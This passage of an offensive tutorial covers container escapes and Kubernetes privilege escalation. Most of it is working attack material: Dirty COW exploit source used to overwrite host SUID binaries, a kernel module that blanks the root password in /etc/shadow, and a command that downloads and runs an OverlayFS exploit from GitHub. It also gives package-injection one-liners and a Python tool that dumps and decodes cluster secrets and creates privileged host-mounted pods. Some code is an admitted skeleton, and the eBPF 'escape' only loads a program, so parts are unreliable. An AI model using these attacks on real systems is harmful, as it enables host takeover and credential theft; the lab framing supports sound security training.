
Device Mount Escapes

If /dev is mounted with insufficient restrictions:

# Check device access
ls -la /dev

# If we can access block devices
fdisk -l /dev/sda  # List partitions on host's disk

# If we can, mount a partition
mkdir -p /tmp/hostdisk
mount /dev/sda1 /tmp/hostdisk
ls -la /tmp/hostdisk  # Now we can access host files

# Access sensitive files
cat /tmp/hostdisk/etc/shadow

Procfs Mount Attacks

The /proc filesystem can provide access to the host when the container shares the host PID namespace (--pid=host) or when the host's /proc is mounted into the container:

# Check if we have unrestricted procfs access
ls -la /proc

# Look for host processes
ps aux | grep -v "ps aux" | grep -v grep

# Try to access host root through proc
ls -la /proc/1/root/

# If accessible, we can read host files
cat /proc/1/root/etc/shadow

# We might even be able to write to the host
echo "malicious content" > /proc/1/root/tmp/evil

Sysfs Mount Attacks

The /sys filesystem gives access to kernel parameters and devices:

# Check sysfs access
ls -la /sys

# Check whether debugfs is exposed (only present if mounted)
ls /sys/kernel/debug/ 2>/dev/null

# Host hardware details are often readable via sysfs/DMI
cat /sys/devices/virtual/dmi/id/product_name 2>/dev/null

# Look for sensitive information
find /sys -name "*secret*" 2>/dev/null

Shared Volume Escape Techniques

If volumes are shared between containers, we can use this to pivot:

# First, identify shared volumes
mount | grep "shared"

# If we find a shared volume, we can potentially write
# malicious files that will be executed by other containers

# For example, if a volume mounted at /shared contains scripts run by other containers
cat << 'EOF' > /shared/script.sh
#!/bin/bash
cp /etc/shadow /shared/shadow
EOF
chmod +x /shared/script.sh

# Now wait for the other container to execute it

Code Injection via NPM/Python Packages

If development volumes are mounted:

# Look for package.json or requirements.txt
find / -name "package.json" -o -name "requirements.txt" 2>/dev/null

# If found, we might be able to inject malicious code
# For Node.js projects
echo 'console.log("Compromised"); require("child_process").execSync("cat /etc/shadow > /app/shadow")' > /app/node_modules/some-package/index.js

# For Python projects
echo 'import os; os.system("cat /etc/shadow > /app/shadow")' > /app/venv/lib/python3.9/site-packages/some_package/__init__.py

X11 Socket Attacks

If the X11 socket is mounted into the container:

# Check for X11 socket
ls -la /tmp/.X11-unix/

# If present, we can potentially capture keystrokes or screenshots
apt-get update && apt-get install -y x11-apps
export DISPLAY=:0
xwd -root -silent | convert xwd:- png:/tmp/screenshot.png

Advanced Volume Manipulation Script

#!/usr/bin/env python3
# volume_explorer.py

import os
import stat
import pwd
import grp
import time

def format_mode(mode):
    """Convert a file mode into a string representation."""
    perms = "-"
    if stat.S_ISDIR(mode):
        perms = "d"
    elif stat.S_ISLNK(mode):
        perms = "l"
    
    # User permissions
    perms += "r" if mode & stat.S_IRUSR else "-"
    perms += "w" if mode & stat.S_IWUSR else "-"
    perms += "x" if mode & stat.S_IXUSR else "-"
    
    # Group permissions
    perms += "r" if mode & stat.S_IRGRP else "-"
    perms += "w" if mode & stat.S_IWGRP else "-"
    perms += "x" if mode & stat.S_IXGRP else "-"
    
    # Other permissions
    perms += "r" if mode & stat.S_IROTH else "-"
    perms += "w" if mode & stat.S_IWOTH else "-"
    perms += "x" if mode & stat.S_IXOTH else "-"
    
    return perms

def scan_for_interesting_files(base_path, max_depth=3, current_depth=0):
    """Scan for interesting files in mounted volumes."""
    interesting_files = []
    
    if current_depth > max_depth:
        return interesting_files
    
    try:
        for item in os.listdir(base_path):
            full_path = os.path.join(base_path, item)
            
            try:
                # Get file stats
                stat_info = os.lstat(full_path)
                mode = stat_info.st_mode
                perms = format_mode(mode)
                
                # Skip if not accessible
                if not os.access(full_path, os.R_OK):
                    continue
                
                # Check if this is a directory to recurse into
                if stat.S_ISDIR(mode) and not os.path.islink(full_path):
                    # Skip certain system directories to avoid rabbit holes
                    if item in ['.', '..', 'proc', 'sys', 'dev', 'run'] and current_depth == 0:
                        continue
                    
                    # Recurse into directory
                    interesting_files.extend(scan_for_interesting_files(full_path, max_depth, current_depth + 1))
                
                # Check for interesting files
                elif (
                    # Executable SUID files
                    (stat.S_ISREG(mode) and (mode & stat.S_ISUID)) or
                    # Writable directories
                    (stat.S_ISDIR(mode) and (mode & stat.S_IWOTH)) or
                    # Interesting file names
                    any(x in item.lower() for x in ['password', 'secret', 'token', 'key', 'config', 'shadow', 'id_rsa']) or
                    # Socket files
                    stat.S_ISSOCK(mode)
                ):
                    try:
                        owner = pwd.getpwuid(stat_info.st_uid).pw_name
                    except:
                        owner = str(stat_info.st_uid)
                    
                    try:
                        group = grp.getgrgid(stat_info.st_gid).gr_name
                    except:
                        group = str(stat_info.st_gid)
                    
                    item_type = "unknown"
                    if stat.S_ISREG(mode):
                        item_type = "file"
                    elif stat.S_ISDIR(mode):
                        item_type = "directory"
                    elif stat.S_ISLNK(mode):
                        item_type = "symlink"
                    elif stat.S_ISSOCK(mode):
                        item_type = "socket"
                    
                    interesting_files.append({
                        'path': full_path,
                        'type': item_type,
                        'perms': perms,
                        'owner': owner,
                        'group': group,
                        'size': stat_info.st_size,
                        'mtime': time.ctime(stat_info.st_mtime)
                    })
            except (PermissionError, FileNotFoundError):
                continue
    except (PermissionError, FileNotFoundError):
        pass
    
    return interesting_files

def check_for_escape_vectors(mount_points):
    """Check each mount point for potential escape vectors."""
    escape_vectors = []
    
    for mount in mount_points:
        # Check if this is a host filesystem mount
        if any(x in mount for x in ['/host', '/mnt', '/var/lib/docker']):
            escape_vectors.append(f"Potential host filesystem mounted at {mount}")
        
        # Check if docker socket is mounted
        if 'docker.sock' in mount:
            escape_vectors.append(f"Docker socket mounted at {mount}")
        
        # Check for device mounts
        if mount.startswith('/dev/'):
            escape_vectors.append(f"Device mounted at {mount}")
        
        # Check for proc filesystem
        if mount == '/proc':
            escape_vectors.append("Proc filesystem mounted")
    
    return escape_vectors

def get_mount_points():
    """Get all mount points in the container."""
    mount_points = []
    
    try:
        with open('/proc/mounts', 'r') as f:
            for line in f:
                parts = line.strip().split()
                if len(parts) >= 2:
                    mount_points.append(parts[1])
    except:
        pass
    
    return mount_points

def main():
    print("[+] Scanning for mount points...")
    mount_points = get_mount_points()
    print(f"[+] Found {len(mount_points)} mount points")
    
    print("[+] Checking for potential escape vectors...")
    escape_vectors = check_for_escape_vectors(mount_points)
    
    if escape_vectors:
        print("[!] Potential escape vectors found:")
        for vector in escape_vectors:
            print(f"  - {vector}")
    else:
        print("[+] No obvious escape vectors found in mount points")
    
    print("[+] Scanning for interesting files...")
    interesting_files = []
    
    for mount in mount_points:
        # Skip some virtual filesystems to avoid clutter
        if mount in ['/proc', '/sys', '/dev', '/run']:
            continue
        
        mount_files = scan_for_interesting_files(mount)
        interesting_files.extend(mount_files)
    
    if interesting_files:
        print(f"[!] Found {len(interesting_files)} interesting files:")
        for item in interesting_files[:20]:  # Show top 20 to avoid overwhelming output
            print(f"  - {item['type']}: {item['path']}")
            print(f"    Permissions: {item['perms']} ({item['owner']}:{item['group']})")
            print(f"    Size: {item['size']} bytes, Modified: {item['mtime']}")
            print()
        
        if len(interesting_files) > 20:
            print(f"  (and {len(interesting_files) - 20} more files)")
    else:
        print("[+] No interesting files found")

if __name__ == "__main__":
    main()

Hands-On Challenge #5: Volume Access Lab

Create containers with various volume configurations and explore escape techniques:

# Create a shared volume
docker volume create shared_vol

# Container 1: With shared volume
docker run -it --rm --name c1 -v shared_vol:/shared ubuntu:20.04 bash

# In Container 1, create a file in the shared volume
echo "This is a test file from Container 1" > /shared/test.txt

# Container 2: Also with the shared volume
docker run -it --rm --name c2 -v shared_vol:/shared ubuntu:20.04 bash

# In Container 2, verify you can see the file
cat /shared/test.txt

# Container 3: With host /proc mounted
docker run -it --rm --name c3 -v /proc:/host_proc ubuntu:20.04 bash

# Try to access host information via /proc
ls -la /host_proc/1/root/

Advanced Kernel Exploitation

At this level, we're exploiting vulnerabilities in the shared kernel to escape container isolation. This requires understanding kernel internals and exploit development.

The Dirty COW Exploit (CVE-2016-5195)

One of the most famous kernel vulnerabilities that allows container escapes:

// dirty_cow.c - CVE-2016-5195 exploit (simplified version)
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg) {
    char *str;
    str = (char *)arg;
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n", c);
    return NULL;
}

void *procselfmemThread(void *arg) {
    char *str;
    str = (char *)arg;
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        lseek(f, (off_t)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("write %d\n", c);
    close(f);
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 3) {
        fprintf(stderr, "Usage: %s target_file new_content\n", argv[0]);
        return 1;
    }
    
    pthread_t pth1, pth2;
    name = argv[1];
    
    // Open the target file
    f = open(name, O_RDONLY);
    if (f == -1) {
        perror("open");
        return 1;
    }
    
    // Get file size
    fstat(f, &st);
    
    // Map the file
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    
    // Create threads
    pthread_create(&pth1, NULL, madviseThread, argv[2]);
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
    
    // Wait for threads to complete
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    
    return 0;
}

Using Dirty COW for Container Escape

# Compile the exploit inside the container
apt-get update && apt-get install -y build-essential
gcc -pthread dirty_cow.c -o dirty_cow

# Use it to modify a SUID binary on the host
# First, check if we can access any SUID binaries from the host
find /proc/1/root -perm -4000 -type f 2>/dev/null

# If found, use Dirty COW to overwrite its contents (the payload must not be longer
# than the original file; bash's $'...' quoting turns \n into real newlines)
./dirty_cow /proc/1/root/usr/bin/some_suid_binary $'#!/bin/sh\ncp /proc/1/root/etc/shadow /tmp/shadow\nchmod 777 /tmp/shadow'

# Execute the SUID binary to trigger our payload
/usr/bin/some_suid_binary

The OverlayFS Vulnerability (CVE-2021-3493)

A 2021 vulnerability in Ubuntu's patched OverlayFS implementation. Note that the code below is only a skeleton: the complete exploit also creates an unprivileged user namespace and abuses setxattr("security.capability") on the overlay upperdir to plant a file with file capabilities on the host filesystem.

// overlayfs.c - CVE-2021-3493 (skeleton)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sys/mount.h>   /* MS_* mount flags */
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>

// Payload to be executed when exploit succeeds
static const char *SHELL = 
    "#!/bin/bash\n"
    "cat /etc/shadow > /tmp/shadow\n"
    "chmod 777 /tmp/shadow\n"
    "bash -i\n";

static void setup_sandbox(void) {
    const unsigned mount_flags = MS_NOSUID | MS_NODEV | MS_NOEXEC | MS_NOATIME;
    
    // Create a temporary directory for our mount point
    if (mkdir("/tmp/exploit", 0777) < 0 && errno != EEXIST)
        err(1, "mkdir(\"/tmp/exploit\")");
    
    // Mount it with overlayfs
    if (syscall(SYS_mount, "overlay", "/tmp/exploit", "overlay", mount_flags,
                "lowerdir=/tmp,upperdir=/tmp,workdir=/tmp") < 0)
        err(1, "mount(\"overlay\")");
}

static void exec_shell(void) {
    // Create a shell script
    int fd = open("/tmp/shell.sh", O_WRONLY | O_CREAT, 0777);
    if (fd < 0)
        err(1, "open(\"/tmp/shell.sh\")");
    
    // Write payload to shell script
    if (write(fd, SHELL, strlen(SHELL)) != strlen(SHELL))
        err(1, "write(\"/tmp/shell.sh\")");
    
    close(fd);
    
    // Execute our shell script
    char *const argv[] = {"/tmp/shell.sh", NULL};
    execve("/tmp/shell.sh", argv, NULL);
    err(1, "execve(\"/tmp/shell.sh\")");
}

int main(int argc, char *argv[]) {
    pid_t pid;
    int status;
    
    printf("[+] CVE-2021-3493 Ubuntu OverlayFS Container Escape\n");
    
    // Set up the sandbox environment
    setup_sandbox();
    
    // Fork a child process to handle the exploit
    pid = fork();
    if (pid == -1)
        err(1, "fork()");
    
    if (pid == 0) {
        // Child process
        exec_shell();
        exit(0);
    }
    
    // Parent process
    if (waitpid(pid, &status, 0) == -1)
        err(1, "waitpid()");
    
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        printf("[+] Exploit completed successfully\n");
    else
        printf("[-] Exploit failed\n");
    
    return 0;
}

Container Breakout via Kernel Module Loading

In privileged containers with CAP_SYS_MODULE:

// kernel_module_escape.c - Kernel module for container escape
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/namei.h>
#include <linux/fs.h>
#include <linux/uaccess.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Researcher");
MODULE_DESCRIPTION("Container Escape Demo");
MODULE_VERSION("0.1");

static int __init escape_init(void) {
    struct path path;
    struct file *file;
    loff_t pos = 0;
    int ret;
    char *payload = "root::19000:0:99999:7:::\n";  /* shadow-format entry: blank root password */
    
    printk(KERN_INFO "Container Escape: Initializing\n");
    
    // Locate the shadow file on the host
    ret = kern_path("/etc/shadow", 0, &path);
    if (ret) {
        printk(KERN_ERR "Container Escape: Failed to find /etc/shadow\n");
        return -1;
    }
    
    // Open the file for writing
    file = filp_open("/etc/shadow", O_WRONLY | O_CREAT, 0644);
    if (IS_ERR(file)) {
        printk(KERN_ERR "Container Escape: Failed to open /etc/shadow\n");
        path_put(&path);
        return PTR_ERR(file);
    }
    
    // Write to the file (reset root password)
    kernel_write(file, payload, strlen(payload), &pos);
    
    // Cleanup
    filp_close(file, NULL);
    path_put(&path);
    
    printk(KERN_INFO "Container Escape: Success! Root password has been reset.\n");
    return 0;
}

static void __exit escape_exit(void) {
    printk(KERN_INFO "Container Escape: Module unloaded\n");
}

module_init(escape_init);
module_exit(escape_exit);

Compile and load the module:

# Install dependencies
apt-get update && apt-get install -y build-essential linux-headers-$(uname -r)

# Create Makefile (quote the heredoc delimiter so $(shell ...) and $(PWD) reach make unexpanded)
cat > Makefile << 'EOF'
obj-m += kernel_module_escape.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

# Compile the module
make

# Load the module to execute the escape
insmod kernel_module_escape.ko

# Remove the module
rmmod kernel_module_escape

eBPF for Container Escape

Using extended Berkeley Packet Filter (eBPF) for kernel exploitation:

// bpf_escape.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>

// Note: the BPF_LD_IMM64 / BPF_LDX_MEM / BPF_MOV64_IMM / BPF_EXIT_INSN macros used
// below are not in the uapi headers; supply them (e.g. from the kernel's
// tools/include/linux/filter.h) when compiling. BPF_PROG_LOAD comes from <linux/bpf.h>.

static inline int bpf(int cmd, union bpf_attr *attr, unsigned int size) {
    return syscall(__NR_bpf, cmd, attr, size);
}

int main(int argc, char **argv) {
    union bpf_attr attr = { 0 };
    int prog_fd;
    
    // BPF program that attempts to access kernel memory
    struct bpf_insn prog[] = {
        // Load address of kernel symbol
        BPF_LD_IMM64(BPF_REG_1, 0xffffffff81000000), // Example kernel address
        // Read from the address
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),
        // Return
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };
    
    printf("[+] Attempting eBPF container escape...\n");
    
    // Prepare BPF program
    attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr.insns = (uint64_t)prog;
    attr.insn_cnt = sizeof(prog) / sizeof(struct bpf_insn);
    attr.license = (uint64_t)"GPL";
    
    // Load BPF program
    prog_fd = bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_fd < 0) {
        printf("[-] Failed to load BPF program: %s\n", strerror(errno));
        if (errno == EPERM) {
            printf("[-] Permission denied. Container might not have CAP_SYS_ADMIN capability.\n");
        }
        return 1;
    }
    
    printf("[+] BPF program loaded successfully. FD: %d\n", prog_fd);
    printf("[+] Container escape might be possible.\n");
    
    close(prog_fd);
    return 0;
}

Kernel Exploit Decision Tree

Do we have CAP_SYS_ADMIN?
├── Yes → Try cgroup release_agent
│   ├── Success → Full host access
│   └── Failure → Try loading kernel module
│       ├── Success → Full host access
│       └── Failure → Try eBPF exploit
└── No → Check kernel version for known vulnerabilities
    ├── Found vulnerable version → Use specific exploit (Dirty COW, OverlayFS)
    │   ├── Success → Full host access
    │   └── Failure → Try other kernel exploits
    └── No known vulnerabilities → Look for other container misconfigurations
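
A few commands gather the data points this tree branches on (a sketch; matching versions to CVEs remains a manual step):

# Gather the inputs for the decision tree above
capsh --print | grep -i cap_sys_admin        # is CAP_SYS_ADMIN available?
uname -r                                      # kernel release (Dirty COW affects kernels before ~4.8.3)
grep PRETTY /etc/os-release 2>/dev/null       # distro (CVE-2021-3493 was specific to Ubuntu's OverlayFS patches)
ls /lib/modules/$(uname -r) 2>/dev/null       # are matching kernel modules/headers present for building?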

Hands-On Challenge #6: Kernel Exploit Lab

WARNING: Only practice these exploits in isolated lab environments!

# Create a privileged container for testing kernel exploits
docker run -it --rm --privileged ubuntu:18.04 bash

# Inside the container, check kernel version
uname -a

# Install build tools
apt-get update && apt-get install -y build-essential

# Download and compile a suitable kernel exploit
# For example, the OverlayFS exploit for Ubuntu
wget https://raw.githubusercontent.com/briskets/CVE-2021-3493/main/exploit.c
gcc exploit.c -o exploit
./exploit

# Verify escape by checking if you can access host files
cat /etc/shadow  # Should be accessible after successful exploit

Kubernetes-Specific Attack Vectors

Kubernetes adds its own attack surface beyond standard container escapes. Let's explore how to pivot within a Kubernetes cluster after gaining initial access to a container.

Kubernetes Architecture Security Overview

Kubernetes components that are relevant for security:

  1. API Server: Central control plane
  2. etcd: Configuration storage
  3. Kubelet: Node agent
  4. Service Accounts: Identity within pods
  5. Network Policies: Traffic control
  6. RBAC: Access control system
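
If the kubectl binary happens to be present in the pod, the same enumeration is faster than raw curl. A sketch assuming kubectl is available:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# What is this service account allowed to do?
kubectl --token="$TOKEN" --server=https://kubernetes.default.svc \
        --insecure-skip-tls-verify=true auth can-i --list

# Quick check for pod listing rights in the current namespace
kubectl --token="$TOKEN" --server=https://kubernetes.default.svc \
        --insecure-skip-tls-verify=true get pods 2>/dev/null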

Service Account Token Attacks

# Service account tokens are mounted by default
ls -l /var/run/secrets/kubernetes.io/serviceaccount/

# Store the token for use
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# Basic API access test
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

# Check what we can access
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -X POST -H "Content-Type: application/json" \
  -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'$NAMESPACE'"}}'

Creating a Privileged Pod

If we have permission to create pods:

# Create a privileged pod manifest
cat <<EOF > privpod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privpod
  namespace: $NAMESPACE
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
  - name: privpod
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
EOF

# Create the pod
curl -k -X POST -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/yaml" \
  --data-binary @privpod.yaml \
  https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

# Check if created
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods/privpod

Automated Kubernetes Privilege Escalation Tool

#!/usr/bin/env python3
# k8s_priv_esc.py - Kubernetes privilege escalation tool

import os
import json
import base64
import requests
import yaml
from urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class KubernetesExploit:
    def __init__(self):
        self.token_path = '/var/run/secrets/kubernetes.io/serviceaccount/token'
        self.namespace_path = '/var/run/secrets/kubernetes.io/serviceaccount/namespace'
        self.api_server = 'https://kubernetes.default.svc'
        self.token = None
        self.namespace = None
        self.permissions = None
    
    def initialize(self):
        """Initialize by reading service account details."""
        if not os.path.exists(self.token_path):
            print("[-] Service account token not found. Are you in a Kubernetes pod?")
            return False
        
        try:
            with open(self.token_path, 'r') as f:
                self.token = f.read().strip()
            
            with open(self.namespace_path, 'r') as f:
                self.namespace = f.read().strip()
            
            print(f"[+] Initialized with token for namespace: {self.namespace}")
            return True
        except Exception as e:
            print(f"[-] Initialization error: {e}")
            return False
    
    def api_request(self, path, method='GET', data=None, content_type='application/json'):
        """Make a request to the Kubernetes API."""
        url = f"{self.api_server}{path}"
        headers = {
            'Authorization': f'Bearer {self.token}',
            'Content-Type': content_type
        }
        
        try:
            if method == 'GET':
                response = requests.get(url, headers=headers, verify=False)
            elif method == 'POST':
                response = requests.post(url, headers=headers, data=data, verify=False)
            else:
                return None, f"Unsupported method: {method}"
            
            if response.status_code >= 200 and response.status_code < 300:
                return response.json(), None
            else:
                return None, f"API error: {response.status_code} - {response.text}"
        except Exception as e:
            return None, f"Request error: {e}"
    
    def check_api_access(self):
        """Check if we can access the Kubernetes API."""
        print("[*] Checking API access...")
        data, error = self.api_request('/api/v1/namespaces')
        
        if error:
            print(f"[-] API access failed: {error}")
            return False
        
        print("[+] Successfully connected to Kubernetes API")
        return True
    
    def check_permissions(self):
        """Check what permissions the service account has."""
        print("[*] Checking service account permissions...")
        
        review_data = json.dumps({
            "kind": "SelfSubjectRulesReview",
            "apiVersion": "authorization.k8s.io/v1",
            "spec": {
                "namespace": self.namespace
            }
        })
        
        data, error = self.api_request(
            '/apis/authorization.k8s.io/v1/selfsubjectrulesreviews',
            method='POST',
            data=review_data
        )
        
        if error:
            print(f"[-] Permission check failed: {error}")
            return False
        
        self.permissions = data
        
        # Check for dangerous permissions
        dangerous_perms = []
        
        if 'status' in data and 'resourceRules' in data['status']:
            for rule in data['status']['resourceRules']:
                resources = rule.get('resources', [])
                verbs = rule.get('verbs', [])
                
                # Check for pod creation
                if '*' in resources or 'pods' in resources:
                    if '*' in verbs or 'create' in verbs:
                        dangerous_perms.append("Pod creation")
                
                # Check for secret access
                if '*' in resources or 'secrets' in resources:
                    if '*' in verbs or 'get' in verbs or 'list' in verbs:
                        dangerous_perms.append("Secret access")
                
                # Check for node access
                if '*' in resources or 'nodes' in resources:
                    dangerous_perms.append("Node access")
                
                # Check for service account creation
                if '*' in resources or 'serviceaccounts' in resources:
                    if '*' in verbs or 'create' in verbs:
                        dangerous_perms.append("ServiceAccount creation")
        
        if dangerous_perms:
            print("[!] Dangerous permissions found:")
            for perm in dangerous_perms:
                print(f"  - {perm}")
        else:
            print("[+] No obviously dangerous permissions found")
        
        return True
    
    def list_secrets(self):
        """Try to list secrets in the namespace."""
        print("[*] Attempting to list secrets...")
        
        data, error = self.api_request(f'/api/v1/namespaces/{self.namespace}/secrets')
        
        if error:
            print(f"[-] Could not list secrets: {error}")
            return False
        
        if 'items' in data:
            print(f"[+] Found {len(data['items'])} secrets")
            for secret in data['items']:
                name = secret['metadata']['name']
                secret_type = secret['type']
                print(f"  - {name} (Type: {secret_type})")
                
                # Try to decode some common secret types
                if secret_type in ['Opaque', 'kubernetes.io/basic-auth']:
                    print("    Data:")
                    for key, value in secret.get('data', {}).items():
                        try:
                            decoded = base64.b64decode(value).decode('utf-8')
                            print(f"      {key}: {decoded}")
                        except:
                            print(f"      {key}: <binary data>")
        
        return True
    
    def create_privileged_pod(self):
        """Attempt to create a privileged pod."""
        print("[*] Attempting to create a privileged pod...")
        
        # Privileged pod manifest
        pod_manifest = {
            "apiVersion": "v1",
            "kind": "Pod",
            "metadata": {
                "name": "privilege-escalation-pod",
                "namespace": self.namespace
            },
            "spec": {
                "hostPID": True,
                "hostIPC": True,
                "hostNetwork": True,
                "containers": [{
                    "name": "privilege-escalation",
                    "image": "ubuntu:20.04",
                    "command": ["sleep", "infinity"],
                    "securityContext": {
                        "privileged": True
                    },
                    "volumeMounts": [{
                        "mountPath": "/host",
                        "name": "hostfs"
                    }]
                }],
                "volumes": [{
                    "name": "hostfs",
                    "hostPath": {
                        "path": "/"
                    }
                }]
            }
        }
        
        data, error = self.api_request(
            f'/api/v1/namespaces/{self.namespace}/pods',
            method='POST',
            data=json.dumps(pod_manifest)
        )
        
        if error:
            print(f"[-] Failed to create privileged pod: {error}")
            return False
        
        print("[+] Successfully created privileged pod 'privilege-escalation-pod'")
        print("[+] Access it with:")
        print(f"    kubectl exec -it -n {self.namespace} privilege-escalation-pod -- bash")
        return True
    
    def check_kubelet_api(self):
        """Try to access the kubelet API on nodes."""
        print("[*] Attempting to discover nodes for kubelet API access...")
        
        data, error = self.api_request('/api/v1/nodes')
        
        if error:
            print(f"[-] Could not list nodes: {error}")
            return False
        
        if 'items' in data:
            print(f"[+] Found {len(data['items'])} nodes")
            
            for node in data['items']:
                node_name = node['metadata']['name']
                addresses = node['status']['addresses']
                
                internal_ip = None
                for address in addresses:
                    if address['type'] == 'InternalIP':
                        internal_ip = address['address']
                        break
                
                if internal_ip:
                    print(f"  - Node: {node_name} (IP: {internal_ip})")
                    print(f"    Kubelet API might be accessible at: https://{internal_ip}:10250/")
                    print(f"    Try: curl -k https://{internal_ip}:10250/pods")
        
        return True
    
    def exploit(self):
        """Run through exploitation steps."""
        if not self.initialize():
            return
        
        if not self.check_api_access():
            return
        
        self.check_permissions()
        self.list_secrets()
        self.create_privileged_pod()
        self.check_kubelet_api()
        
        print("\n[+] Exploitation complete. Check results above for successful vectors.")

if __name__ == "__main__":
    exploiter = KubernetesExploit()
    exploiter.exploit()

Kubelet API Attacks

If the kubelet's read-only port (10255) or its main API port (10250) is reachable and allows anonymous or unauthorized requests:

# Check if we can access kubelet API
curl -k https://NODE_IP:10250/pods

# If accessible, we can execute commands in other pods
curl -k -X POST "https://NODE_IP:10250/run/NAMESPACE/POD_NAME/CONTAINER_NAME" \
  -d "cmd=cat /etc/shadow"

# We can also run commands on the node via hostPath pods
# First create a pod with hostPath
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-pod
spec:
  containers:
  - name: busybox
    image: busybox
    command: ["sleep", "3600"]
    volumeMounts:
    - mountPath: /host
      name: hostpath
  volumes:
  - name: hostpath
    hostPath:
      path: /
EOF

# Then exec into it via kubelet
curl -k -X POST "https://NODE_IP:10250/run/default/hostpath-pod/busybox" \
  -d "cmd=cat /host/etc/shadow"

etcd Direct Access

If etcd is accessible:

# Check if etcd is accessible
curl -k https://ETCD_IP:2379/version

# List all keys
curl -k https://ETCD_IP:2379/v2/keys/?recursive=true

# Get specific secrets (like service account tokens)
curl -k https://ETCD_IP:2379/v2/keys/registry/secrets/kube-system/default-token-xyz
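
Note that current Kubernetes versions store their state in etcd v3, where the v2 HTTP keys API above returns nothing useful. If etcdctl is available, a minimal sketch follows; it assumes the endpoint is misconfigured to accept anonymous requests, or that you've recovered client certificates (for example from /etc/kubernetes/pki/etcd on a kubeadm control-plane node):

# etcd v3: list all Kubernetes keys
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
  get / --prefix --keys-only

# Read a specific secret object
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
  get /registry/secrets/kube-system/default-token-xyz

# If client certs are required, add:
#   --cacert=ca.crt --cert=client.crt --key=client.key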

API Server Vulnerabilities

Exploiting API server misconfiguration:

# Anonymous access check
curl -k https://KUBERNETES_API_SERVER/api/v1/namespaces

# Check for unauthenticated access to pod exec (quote the URL so the shell doesn't interpret the &)
curl -k "https://KUBERNETES_API_SERVER/api/v1/namespaces/default/pods/mypod/exec?command=ls&stdin=true&stdout=true&stderr=true"

# Leverage aggregated API servers if available
curl -k https://KUBERNETES_API_SERVER/apis/metrics.k8s.io/v1beta1/nodes

Kubernetes Decision Tree

Do we have service account token?
├── Yes → Check permissions with SelfSubjectRulesReview
│   ├── Can create pods? → Create privileged pod
│   │   └── Success → Access host through privileged pod
│   ├── Can read secrets? → Gather service account tokens
│   │   └── Try more powerful service account token
│   ├── Can access nodes? → Check for kubelet API access
│   │   └── Run commands via kubelet API
│   └── Limited permissions → Look for RBAC misconfigurations
└── No → Check for NetworkPolicy gaps
    ├── Can access etcd? → Extract secrets from etcd
    ├── Can access kubelet? → Execute commands via kubelet
    └── Can access API aggregation layer? → Look for vulnerabilities

Hands-On Challenge #7: Kubernetes Privilege Escalation

Set up a local Kubernetes environment with Minikube and practice privilege escalation:

# Start Minikube (RBAC is enabled by default on current versions)
minikube start

# Create a pod with a vulnerable service account
kubectl create serviceaccount vulnerable-sa

# Create a role with excessive permissions
kubectl create role vulnerable-role \
  --verb=create,list,get \
  --resource=pods,secrets

# Bind the role to the service account
kubectl create rolebinding vulnerable-binding \
  --role=vulnerable-role \
  --serviceaccount=default:vulnerable-sa

# Create a pod using this service account
# (everything after "--" is treated as the command, so flags must come first;
#  newer kubectl versions dropped --serviceaccount, so set it via --overrides)
kubectl run vulnerable-pod \
  --image=ubuntu:20.04 \
  --overrides='{"apiVersion":"v1","spec":{"serviceAccountName":"vulnerable-sa"}}' \
  --command -- sleep infinity

# Now practice the privilege escalation techniques within this pod
kubectl exec -it vulnerable-pod -- bash
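
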